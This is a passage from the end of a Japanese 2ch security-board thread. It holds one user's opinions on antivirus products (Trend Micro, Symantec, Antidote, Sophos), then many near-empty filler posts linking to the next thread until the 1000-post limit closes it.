NGNGリンクは便利だよ。
トレンドが鯖不調で繋がらなかったり、メール送れない。
そのせいか、定義ファイルから漏れているのが多いような気が。
Symantecは、「送る必要がないですよん」、なんて表示がでて腹立つし。
アルカリスなどは検出できない(対応しているはずなのに)。
現在メーカー製で信頼できるのは、漏れ的にはAntidote。
LZHはダメだけど。検出力には不満は無い。
Sophos早く買ってテストしようっと(楽しみ
0950名無しさん@お腹いっぱい。
NGNGsage で埋め立てたいと思います。
協力してください。
0951名無しさん@お腹いっぱい。
NGNG0953名無しさん@お腹いっぱい。
NGNG0954☆ウィルス情報&質問 総合スレッド☆part2
NGNG0955埋め立て屋
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
0956名無しさん@埋め立て中…
NGNG0957名無しさん@埋め立て中…
NGNG0958名無しさん@お腹いっぱい。
NGNG0960埋め立て屋
NGNG0961埋め立て屋
NGNG0962埋め立て屋
NGNG0963埋め立て屋
NGNG0964埋め立て屋
NGNG0965埋め立て屋
NGNG0966埋め立て屋
NGNG0967埋め立て屋
NGNG0968埋め立て屋
NGNG0969埋め立て屋
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
0970速いな
NGNG0971☆ウィルス情報&質問 総合スレッド☆part2
NGNG0972化け猫
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/
0973化け猫
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/
0974☆ウィルス情報&質問 総合スレッド☆part2
NGNG0975☆ウィルス情報&質問 総合スレッド☆part2
NGNG0977化け猫
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/
0978化け猫
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/
0979化け猫
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/
0980化け猫
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/
0981埋め立て屋
NGNG0982埋め立て屋
NGNG0983埋め立て屋
NGNG0984埋め立て屋
NGNG0985埋め立て屋
NGNG0986埋め立て屋
NGNG0987埋め立て屋
NGNG0988埋め立て屋
NGNG0989埋め立て屋
NGNG0990埋め立て屋
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
0991埋め立て屋
NGNG0992埋め立て屋
NGNG0993埋め立て屋
NGNG0994埋め立て屋
NGNG0995埋め立て屋
NGNG0996埋め立て屋
NGNG0997埋め立て屋
NGNG0998埋め立て屋
NGNG0999埋め立て屋
NGNG1000埋め立て屋
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1016863569/1-5
10011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。